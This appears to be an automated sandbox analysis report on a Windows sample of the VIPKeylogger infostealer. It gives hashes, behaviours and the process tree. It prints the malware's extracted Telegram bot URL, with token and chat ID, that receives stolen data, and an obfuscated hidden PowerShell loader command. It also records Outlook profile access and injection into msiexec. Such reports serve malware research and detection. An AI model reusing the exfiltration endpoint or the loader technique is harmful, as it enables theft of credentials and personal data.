Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-01-2025 05:58
Static task
static1
Behavioral task
behavioral1
Sample
f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20241023-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe
-
Size
560KB
-
MD5
21eb0bfd14e8ab29a3c29d5b60ee09e1
-
SHA1
9cff284042166495e20428500545b99330a1a9c8
-
SHA256
f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba
-
SHA512
cf0d15a179940c800cb669384a0874200650b0da7b8db58c3e1a8cf87cb5d3ac5953a10c68366436917812f24d32a7f12506831294bec53b6e41ed8a7b1a56e8
-
SSDEEP
12288:n93jlz5CwkzUf1DYt/itWe7NAZSfR6IWAKsbk1B8B:n93jlzcxzUf9S6tx7mWKNeoiB
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7808466522:AAFleMCkdYBjkW3SQRMH5osM11THNEIFjRA/sendMessage?chat_id=7161037710
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4804 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 2456 f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 10 IoCs
flow pid Process 30 1724 msiexec.exe 34 1724 msiexec.exe 36 1724 msiexec.exe 38 1724 msiexec.exe 42 1724 msiexec.exe 45 1724 msiexec.exe 48 1724 msiexec.exe 51 1724 msiexec.exe 54 1724 msiexec.exe 65 1724 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 drive.google.com 30 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 checkip.dyndns.org 47 reallyfreegeoip.org 48 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1724 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4804 powershell.exe 1724 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\udlndingelovene\troldunge.ini f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 1724 msiexec.exe 1724 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4804 powershell.exe Token: SeIncreaseQuotaPrivilege 4804 powershell.exe Token: SeSecurityPrivilege 4804 powershell.exe Token: SeTakeOwnershipPrivilege 4804 powershell.exe Token: SeLoadDriverPrivilege 4804 powershell.exe Token: SeSystemProfilePrivilege 4804 powershell.exe Token: SeSystemtimePrivilege 4804 powershell.exe Token: SeProfSingleProcessPrivilege 4804 powershell.exe Token: SeIncBasePriorityPrivilege 4804 powershell.exe Token: SeCreatePagefilePrivilege 4804 powershell.exe Token: SeBackupPrivilege 4804 powershell.exe Token: SeRestorePrivilege 4804 powershell.exe Token: SeShutdownPrivilege 4804 powershell.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeSystemEnvironmentPrivilege 4804 powershell.exe Token: SeRemoteShutdownPrivilege 4804 powershell.exe Token: SeUndockPrivilege 4804 powershell.exe Token: SeManageVolumePrivilege 4804 powershell.exe Token: 33 4804 powershell.exe Token: 34 4804 powershell.exe Token: 35 4804 powershell.exe Token: 36 4804 powershell.exe Token: SeDebugPrivilege 1724 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2456 wrote to memory of 4804 2456 f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe 83 PID 2456 wrote to memory of 4804 2456 f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe 83 PID 2456 wrote to memory of 4804 2456 f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe 83 PID 4804 wrote to memory of 1724 4804 powershell.exe 97 PID 4804 wrote to memory of 1724 4804 powershell.exe 97 PID 4804 wrote to memory of 1724 4804 powershell.exe 97 PID 4804 wrote to memory of 1724 4804 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe"C:\Users\Admin\AppData\Local\Temp\f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1724
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
756B
MD50ba256d4102dcbe85799512d258d89f8
SHA1554af9e9adcf584dcdd787e95086f7ddb0f98652
SHA2560bf8cfedc6b9dfa185bb2ca1648bbe44c76a5605c459d1a7cf7162c8e3c9b227
SHA512e98167b0043881e0da48d10c66044d8a3cfe48d9076fa26477bc239c1b5c21734bef91e8a3ccde75d1c22f48578712987cff510c0e39f36548788850dfd1a258
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
336KB
MD58fb7148f8dbda5b61030f3dfb6d7fa25
SHA1da981906695b80ce5e6c8f7e20e945e6a0899aa7
SHA256f3266f0aa22192f9e01248a771505a0fe3c05ff63fc7a88ce56ade7d7af20903
SHA512edf1b8a264fa98131933f3a5c734bbf1631941f648eeb89742c0c6cd43225d67bf99c221e7b23817a0c9f6de1f54887f4d1650db9805c459dbab007f1e5f514b
-
Filesize
66KB
MD5ea1e2a9f4de28839b57fe9978897843c
SHA1b012c5ac62dbc1657062674e6ff102a2209ae777
SHA2567c6bbb62d20bb41ff822a460afcc6cd4dc670453aa333558db29d53b7e6bb027
SHA512ba127e3e91c4e233e778abdd86e59b5272023c99ed0c069361e3ae0b8d4e65a7d3f57887af7bb714f50df22572cb845088b67f4184254e6155bd196adc42537a